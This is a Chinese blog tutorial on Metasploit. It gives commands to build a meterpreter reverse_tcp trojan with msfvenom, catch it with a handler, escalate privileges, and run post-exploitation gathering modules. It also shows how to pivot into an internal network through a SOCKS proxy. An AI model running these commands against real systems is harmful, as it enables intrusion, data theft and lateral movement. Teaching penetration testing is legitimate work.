metasploit-framework(MSF)工具的使用

最新推荐文章于 2024-05-08 17:20:32 发布
最新推荐文章于 2024-05-08 17:20:32 发布
阅读量1k 收藏 4
点赞数 3
分类专栏: metasploit-framework(msf) 内网渗透 黑客工具 文章标签: 安全 linux 扫描测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42299610/article/details/104953565
版权

metasploit-framework功能模块介绍
1.msfconsole
作用:
管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。
模块介绍:
exploits:攻击脚本
payloads:攻击载荷(攻击效果控制)
auxiliaru:辅助模块(扫描工具等)
post:后渗透模块(提取信息)
encoders编码模块
nops:无操作生成器
2.msfvenom
作用:
制作木马
3.msfencode
作用:
对木马进行编码

metasploit-framework简单运用
1.初始化metasploit-framework

msfconsole

在这里插入图片描述
2.查看payload模块
show payloads
在这里插入图片描述
3.使用payload:windows/x64/meterpreter/reverse_tcp。

use windows/x64/meterpreter/reverse_tcp

在这里插入图片描述

4.另打开一个终端,使用msfvenom制作windows/x64/meterpreter/reverse_tcp木马

msfvenom  -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.106 lport=4444 -f exe -o a.exe

在这里插入图片描述

5.使用攻击模块exploit/multi/handler,并查看选项

use exploit/multi/handler
show options

在这里插入图片描述6.设置目标机器上对应的木马模块

set payload windows/x64/meterpreter/reverse_tcp

在这里插入图片描述

7.设置目标机器连接的主机IP

 set lhost 192.168.1.106

在这里插入图片描述

8.开始监听,当目标机器运行对应的木马文件就能操作目标机器

exploit

在这里插入图片描述

metasploit-framework反弹shell
提升受害者机器的权限(如果提权失败,可以尝试使用Exploit/windows/local/bypassuac模块)

getsystem

在这里插入图片描述
get shell并执行系统命令

shell

在这里插入图片描述metasploit-framework信息收集
获取目标机器最近的系统盘信息

run post/windows/gather/forensics/enum_drives

在这里插入图片描述

判断目标机器是否为虚拟机

run post/windows/gather/checkvm

在这里插入图片描述
获取目标机器分享文件信息

run post/windows/gather/enum_shares

在这里插入图片描述
获取目标机器开启的服务

run post/windows/gather/enum_services

在这里插入图片描述

获取目标机器最近的操作

run post/windows/gather/dumplinks

在这里插入图片描述
使用脚本获取目标机器敏感信息,并在/root/.msf4/logs/scripts/winenum目录下生成报告。

run winenum
cd /root/.msf4/logs/scripts/winenum

在这里插入图片描述
在这里插入图片描述

metasploit-framework反向代理
reverse 反向的
1.执行ipconfig查看目标机器的IP详情,目标Windows server 2008的IP地址有192.168.1.105和10.10.10.1,演示10.10.10.1

ipconfig

在这里插入图片描述
2.将该模块添加到后台运行

background

在这里插入图片描述

3.添加10.10.10.1 网段的路由

route add 10.10.10.1 255.0.0.0 1

在这里插入图片描述4.显示路由

route print

在这里插入图片描述
5.开启socks4代理 服务

use auxiliary/server/socks4a

在这里插入图片描述
6.将该功能添加到后台运行

exploit -y

在这里插入图片描述
7.查看到1080端口开放,代理已经开启

netstat -anpt

在这里插入图片描述
8.修改Linux代理的配置文件,如下图

vim /etc/proxychains.conf

在这里插入图片描述
9.使用proxychains直接代理连接目标服务器即可

proxychains rdesktop 10.10.10.1

在这里插入图片描述

weixin_42299610
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
metasploit-framework工具
10-09
MSF漏洞测试工具 使用方法: 根据漏洞名称搜索 : search ms17_010 设置模块:use auxiliary/scanner/smb/smb_ms17_010 设置目标地址:set rhosts x.x.x.x 设置好了之后,run或者exploit 进行攻击
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
Metasploit入门教程(非常详细)从零基础入门到精通,看完这一篇就够了!
m0_74131821的博客
05-27 2792
Metasploit之所以流行,是因为它可以执行广泛的安全测试任务,从而简化渗透测试的工作。Metasploit 适用于所有流行的操作系统,本文中,主要以Kali Linux为主。因为Kali Linux预装了 Metasploit框架和运行在框架上的其他第三方工具
Metasploit基础教程和简单使用
qq_41344881的博客
08-07 1048
一、工具概述#二、使用方法#三、常用命令#四、举例使用
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
最新发布
XLbb的博客
05-08 1771
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSFMetasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具
Metasploit使用教程
Kali与编程
03-23 1892
例如,payload/windows/meterpreter/reverse_tcp是一个Windows系统的Meterpreter反向Shell Payload,可以建立与攻击机的反向连接并提供完全的系统访问权限。Payload模块是Metasploit中最重要的模块之一,它用于实现对目标系统的控制。Metasploit支持多种不同的操作系统(Windows、Linux、MacOS等)和硬件平台(x86、ARM等),并提供了多种编程接口,包括Ruby API、Python API、Java API等。
MSF 详解
m0_72125469的博客
05-19 4459
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。
Metasploit Framework使用说明
我喜欢某某某的专栏
07-22 3596
 Metasploit Framework 下载地址:http://metasploit.com/命令行下使用Metasploit运行后首先看到的是Metasploit欢迎界面,我们输入“?”得到在线帮助(如图1所示):图1可以看到里面有很多的命令,下面我将最重要的几个做简单解释:    “?”:得到帮助。    “cd”:更换当前的工作目录。    “exit”:退出。 
metasploit-framework-master.zip
09-08
Metasploit Framework,简称MSF,是一款开源的安全漏洞检测和利用工具,广泛应用于网络安全评估和渗透测试。它由 Rapid7 维护,是全球黑客社区的重要资源,同时也是信息安全专业人员的必备武器。"metasploit-...
metasploit-framework-6.3.34.zip
09-17
Metasploit Framework,简称MSF,是一款开源的安全漏洞检测工具,主要用于安全研究人员进行渗透测试和漏洞验证。这个版本是6.3.34,代表着软件的最新迭代,通常会包含最新的功能、修复和性能改进。在网络安全领域,...
dockerfile-msf:该Dockerfile构建了一个安装了Metasploit-Framework的基于Debian的Docker容器。 在任何设备上(包括Linux,MacOS或Windows)部署Metasploit的快速简便方法!
05-23
该Dockerfile构建了一个安装了Metasploit-Framework的基于Debian的Docker容器。 在任何设备上(包括Linux,MacOS或Windows)部署Metasploit的快速简便方法! MSF通过以下方式自动启动: 安装所有依赖项, 启动时...
Metasploit 4.0下载地址
03-09
Metasploit 4.0下载地址,window版,最新版,资源太大,无法上传,请谅解!
工具使用】——Metasploit(MSF)使用详解(超详细)
热门推荐
weixin_45588247的博客
08-12 9万+
文章目录01Metasploit使用一、简介:二、Metasploit的安装和更新升级:1. 一键安装MSF:2. MSF的更新升级:三、使用方法:1. 基础使用:2. `MSF`中加载自定义的`exploit模块`:3. 漏洞利用(exploit):4. 攻击载荷(payload):4.1 payload模块路径::4.2 Metasploit中的 Payload 模块主要有以下三种类型:5. Meterpreter:5.1 Meterpreter是如何工作的?:5.2 Meterpreter的特点:6.
渗透测试工具篇之MetasploitMSF)框架介绍与基本命令
lzp_5257的博客
04-22 5382
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 前言 我们能够通过它发现漏洞并进行快速实施攻击 MetasploitMSF)是一个免费的、可下载的框架,通过它可以很容易的获取、开发并且对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 一、MSF常用模块 Auxiliary 辅助模块:为渗透测试信息搜索提供了大量的辅助模块支持。 Exploits 攻击模块:利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而获得对远程目标系统访问权的代码组件。 Paylo.
内网渗透之——msf工具使用
wsnbbz的博客
03-16 7162
1.msfconsole 作用: 管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。 模块介绍: exploits:攻击脚本 payloads:攻击载荷(攻击效果控制) auxiliaru:辅助模块(扫描工具等) post:后渗透模块(提取信息) encoders编码模块 nops:无操作生成器 2.msfvenom 作用: 制作木马 3.msfencode 作用: 对木马...
渗透工具msf
zhalang8324的博客
08-17 3万+
转载自 csdn:忆蓉之心 简介 它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 环境 工具msf4 伪装木马 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
Metasploit framework(一)——简单介绍其来源及历史
Jeromeyoung
03-24 1166
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻...
【常用工具MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞。
windows上安装Metasploit Framework 4.0
weixin_34309543的博客
02-28 663
今天在给朋友的windows上安装MetasploitFramework4.0的时候出现以下错误: ErrorrunningC:\ProgramFiles\Rapid7\framework/postgresql/bin/psql.exe-Upostgres-p7175-hlocalhost-c"ALTERUSERpostgres...
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/activerecord-7.0.4.2/lib/active_record/connection_adapters/postgresql_adapter.rb:81:in `rescue in new_client': We could not find your database: msf. Which can be found in the database configuration file located at config/database.yml. (ActiveRecord::NoDatabaseError)
07-20
你遇到了一个错误,提示无法找到名为"msf"的数据库。这个问题通常是由于缺少数据库配置文件或配置文件中的错误导致的。请确保你已经正确配置了数据库,并且配置文件中包含了正确的数据库名称。 可以尝试以下步骤来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

weixin_42299610

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值